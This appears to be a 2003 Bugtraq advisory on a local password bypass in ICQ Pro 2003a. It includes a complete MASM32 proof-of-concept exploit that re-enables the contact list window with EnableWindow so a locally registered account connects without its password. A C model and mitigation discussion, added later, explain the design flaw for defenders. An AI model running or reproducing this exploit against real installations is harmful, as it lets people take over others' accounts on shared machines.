ICQ 2003a Password Bypass

From: Cauã (mouraprado_at_infoguerra.com.br)
Date: 07/05/03

    Date: 5 Jul 2003 13:30:23 -0000
    To: bugtraq@securityfocus.com
    
    
    Software: ICQ 2003a
    Threat: Login password can be bypassed locally

    I have found a vulnerability in ICQ Pro 2003a that
    allows anyone to connect to the ICQ server using any
    account registered locally, regardless of whether the
    'save password' option is checked or not. The high-level
    security password is also bypassed!

    How does it work?
    Simple! You can use the EnableWindow API to re-enable the
    ICQ contact list window, which the login prompt disables
    (the prompt is a child dialog of that window) while it is
    shown. Once the window is enabled again you can set your
    status to online, and the UIN connects no matter how high
    your security level is.

    I coded a proof-of-concept exploit on July 2, when
    I found the vuln.
    The exploit is provided "as is" without warranties.
    To compile it you will need MASM32.

    ; ████████████████████████████████████████████████████████████████████████
    ; CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE BOF
    ; ------------------------------------------------------------------------
    ;
    ; 07/02/2003 - ca1-icq.asm
    ; ICQ Password Bypass exploit.
    ; written by Cauã Moura Prado (aka ca1)
    ; mouraprado@infoguerra.com.br - ICQ 373313
    ;
    ; This exploit allows you to log in to the ICQ server using any account registered *locally*,
    ; no matter whether the 'save password' option is checked or not. High level security is also bypassed.
    ; All you have to do is run the exploit and set the status property using your mouse when the flower
    ; is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
    ; the exploit again. Greets to: Alex Demchenko (aka Coban), my cousin Rhenan for testing the exploit
    ; on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
    ; I can't forget... many kisses to those 3 chicks from my building for being so hot!! ;)
    ;
    ;
    ;                    uh-oh!
    ;                     ___
    ;                  __/   \__
    ;                 /  \___/  \       Vulnerable:
    ;                 \__/+ +\__/       ICQ Pro 2003a Build #3800
    ;                 /  \~~~/  \
    ;                 \__/   \__/       Not Vulnerable:
    ;                    \___/          ICQ Lite alpha Build 1211
    ;                                   ICQ 2001b and ICQ 2002a
    ;                 tHe Flaw Power    All other versions were not tested.
    ;
    ;                                   coded with masm32
    ;
    ; _______________________________________________________________________________
    ;                                                             exploit born in .br
            
    .386
    .model flat, stdcall
    option casemap:none
    include \masm32\include\user32.inc
    include \masm32\include\kernel32.inc
    includelib \masm32\lib\user32.lib
    includelib \masm32\lib\kernel32.lib
    .data
    szTextHigh byte 'Password Verification', 0    ; title of the high-security login prompt
    szTextLow byte 'Login to server', 0           ; title of the regular login prompt
    szClassName byte '#32770', 0                  ; window class of a standard Windows dialog
    .data?
    hWndLogin dword ?                             ; handle of whichever login dialog is found
    .code
    _entrypoint:
     ; look for the high-security prompt first, then the regular one
     invoke FindWindow, addr szClassName, addr szTextHigh
     mov hWndLogin, eax
     .if hWndLogin == 0
       invoke FindWindow, addr szClassName, addr szTextLow
       mov hWndLogin, eax
     .endif
     ; the dialog's parent is the contact list window, disabled while the prompt is up
     invoke GetParent, hWndLogin
     invoke EnableWindow, eax, 1                  ; enable ICQ contact list
     invoke ShowWindow, hWndLogin, 0              ; get rid of login screen (don't kill this window)
     invoke ExitProcess, 0                        ; uhuu.. cya! i gotta sleep!
    end _entrypoint

    ; ████████████████████████████████████████████████████████████████████████
    ; CUT HERE - CUT HERE - ca1-icq.asm - CUT HERE - CUT HERE EOF
    ; ------------------------------------------------------------------------
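The mechanism the advisory describes (the login prompt disables its parent window, and re-enabling that window from outside restores the path that connects the account) is a design lesson as much as a bug: a window's enabled state is not an authorization check, because any process on the same desktop can change it with EnableWindow. The C program below is an added illustration and is neither part of the original post nor ICQ's code. It models the client's "go online" gate as a small state machine and contrasts a gate that relies on UI state with one that checks an authenticated flag in the connect path. EnableWindow and GetParent are the real Win32 calls the exploit uses; the client_state struct, the function names and the stored password are constructed for this model.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a chat client's login gate; not ICQ's code.
 * contact_list_enabled mirrors pure UI state (what EnableWindow flips);
 * password_verified is application state that only the password path sets. */
typedef struct {
    bool contact_list_enabled;
    bool password_verified;
} client_state;

/* Constructed stored secret for the model; a real client compares a hash. */
static const char *const kLocalPassword = "correct horse";

/* The login prompt appears: it disables the contact list and clears any
 * earlier authentication so that a fresh password is required. */
void show_login_prompt(client_state *s) {
    s->contact_list_enabled = false;
    s->password_verified = false;
}

/* What EnableWindow(GetParent(hWndLogin), TRUE) from another process
 * achieves in this model: only the UI flag changes, nothing else. */
void external_enable_window(client_state *s) {
    s->contact_list_enabled = true;
}

/* The only code allowed to set password_verified. */
bool verify_password(client_state *s, const char *attempt) {
    s->password_verified = (strcmp(attempt, kLocalPassword) == 0);
    return s->password_verified;
}

/* Flawed gate: "the status menu is only reachable while the window is
 * enabled, and the window is only enabled after login" is an assumption
 * about the UI, not a check made by the code that connects. */
bool flawed_go_online(const client_state *s) {
    return s->contact_list_enabled;   /* proceeds to connect */
}

/* Hardened gate: the connect path checks the authenticated flag itself;
 * the window's enabled state plays no part in the decision. */
bool hardened_go_online(const client_state *s) {
    return s->password_verified;
}

/* Scenario 1: window re-enabled from outside, no password entered. */
bool flawed_client_connects_without_password(void) {
    client_state s = {0};
    show_login_prompt(&s);
    external_enable_window(&s);
    return flawed_go_online(&s);      /* true: the advisory's bypass */
}

/* Scenario 2: the same trick against the hardened gate. */
bool hardened_client_refuses_without_password(void) {
    client_state s = {0};
    show_login_prompt(&s);
    external_enable_window(&s);
    return !hardened_go_online(&s);   /* true: still refused */
}

/* Scenario 3: the hardened gate still admits a genuine login. */
bool hardened_client_connects_after_password(void) {
    client_state s = {0};
    show_login_prompt(&s);
    return verify_password(&s, "correct horse") && hardened_go_online(&s);
}

int main(void) {
    printf("flawed gate bypassed by EnableWindow:   %s\n",
           flawed_client_connects_without_password() ? "yes" : "no");
    printf("hardened gate bypassed by EnableWindow: %s\n",
           hardened_client_refuses_without_password() ? "no" : "yes");
    printf("hardened gate after real password:      %s\n",
           hardened_client_connects_after_password() ? "connected" : "refused");
    return 0;
}
```

The hardened gate closes the UI shortcut, but it is not the whole fix: the client still holds whatever it needs to log the locally registered account in, and a process running as the same Windows user sits inside the same trust boundary as the client, so an in-process flag only raises the bar from "call EnableWindow" to tampering with the process itself. The durable mitigations are not keeping a usable credential in the client when the user has declined to save it, and making the connect path re-prompt when no verified session exists.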

